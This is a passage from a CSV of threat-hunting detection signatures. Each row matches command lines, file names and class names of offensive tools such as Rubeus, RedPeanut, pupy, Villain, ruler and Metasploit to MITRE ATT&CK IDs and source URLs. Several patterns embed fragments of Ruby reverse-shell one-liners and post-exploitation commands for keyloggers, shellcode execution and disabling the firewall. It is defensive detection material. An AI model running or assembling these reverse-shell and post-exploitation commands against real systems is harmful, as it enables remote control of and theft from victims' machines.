Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*RubeusMonitorManager*",".{0,1000}RubeusMonitorManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusMonitorMenu*",".{0,1000}RubeusMonitorMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusPttManager*",".{0,1000}RubeusPttManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusPttMenu*",".{0,1000}RubeusPttMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusPurgeManager*",".{0,1000}RubeusPurgeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusPurgeMenu*",".{0,1000}RubeusPurgeMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusRenewManager*",".{0,1000}RubeusRenewManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusRenewMenu*",".{0,1000}RubeusRenewMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusS4UManager*",".{0,1000}RubeusS4UManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 
/ 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusS4UMenu*",".{0,1000}RubeusS4UMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusTgtDelegManager*",".{0,1000}RubeusTgtDelegManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusTgtDelegMenu*",".{0,1000}RubeusTgtDelegMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusTriageManager*",".{0,1000}RubeusTriageManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*ruby CVE-202*-*.rb 
*",".{0,1000}ruby\sCVE\-202.{0,1000}\-.{0,1000}\.rb\s.{0,1000}","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","1","62","23","2024-03-24T00:46:38Z","2023-06-12T12:56:12Z" "*ruby poc-cve-202*-*.rb*",".{0,1000}ruby\spoc\-cve\-202.{0,1000}\-.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","1","62","23","2024-03-24T00:46:38Z","2023-06-12T12:56:12Z" "*ruby -rsocket -e*TCPSocket.new*loop*gets*chomp*IO.popen*read*",".{0,1000}ruby\s\-rsocket\s\-e.{0,1000}TCPSocket\.new.{0,1000}loop.{0,1000}gets.{0,1000}chomp.{0,1000}IO\.popen.{0,1000}read.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""/bin/bash"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""\/bin\/bash\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""/bin/sh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""\/bin\/sh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell 
Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""bash"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""bash\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""cmd"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""cmd\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""powershell"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""powershell\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""pwsh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""pwsh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby 
-rsocket -e'spawn(""sh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""sh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""zsh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""zsh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby_nntpd_cmd_exec*",".{0,1000}ruby_nntpd_cmd_exec.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*ruby_no_sh_reverse_tcp.py*",".{0,1000}ruby_no_sh_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*ruby_reverse_tcp.py*",".{0,1000}ruby_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*Rudrastra-main.zip*",".{0,1000}Rudrastra\-main\.zip.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*ruler * abk dump -o *",".{0,1000}ruler\s.{0,1000}\sabk\sdump\s\-o\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ruler --insecure *",".{0,1000}\/ruler\s\-\-email\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*ruler -k -d * brute --users *",".{0,1000}ruler\s\-k\s\-d\s.{0,1000}\sbrute\s\-\-users\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ruler -k --nocache --url ",".{0,1000}ruler\s\-k\s\-\-nocache\s\-\-url\s","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*ruler-linux64*",".{0,1000}ruler\-linux64.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*ruler-linux86*",".{0,1000}ruler\-linux86.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*ruler-osx64*",".{0,1000}ruler\-osx64.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*ruler-win64.exe*",".{0,1000}ruler\-win64\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*ruler-win86.exe*",".{0,1000}ruler\-win86\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*rules/d3ad0ne.rule*",".{0,1000}rules\/d3ad0ne\.rule.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*run * pyshell*",".{0,1000}run\s.{0,1000}\spyshell.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run android_cam *",".{0,1000}run\sandroid_cam\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run --bg shell_exec*",".{0,1000}run\s\-\-bg\sshell_exec.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run DNSStager as root*",".{0,1000}run\sDNSStager\sas\sroot.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*run -Executable *.exe*",".{0,1000}run\s\-Executable\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*run interactive_shell*",".{0,1000}run\sinteractive_shell.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run keylogger*",".{0,1000}run\skeylogger.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run memory_exec *.*",".{0,1000}run\smemory_exec\s.{0,1000}\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run mouselogger*",".{0,1000}run\smouselogger.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run post/windows/gather/checkvm*",".{0,1000}run\spost\/windows\/gather\/checkvm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","1026","137","2024-04-30T15:57:18Z","2021-08-16T17:34:25Z" "*run post/windows/manage/killfw*",".{0,1000}run\spost\/windows\/manage\/killfw.{0,1000}","offensive_tool_keyword","metasploit","Metasploit 
Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","1026","137","2024-04-30T15:57:18Z","2021-08-16T17:34:25Z" "*run post/windows/manage/migrate*",".{0,1000}run\spost\/windows\/manage\/migrate.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","1026","137","2024-04-30T15:57:18Z","2021-08-16T17:34:25Z" "*run pyexec *",".{0,1000}run\spyexec\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run --rm -it xshuden/cheetah*",".{0,1000}run\s\-\-rm\s\-it\sxshuden\/cheetah.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*run shell_exec 
*",".{0,1000}run\sshell_exec\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run shellcode_exec*",".{0,1000}run\sshellcode_exec.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Run the krbscm method for SYSTEM shell*",".{0,1000}Run\sthe\skrbscm\smethod\sfor\sSYSTEM\sshell.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege 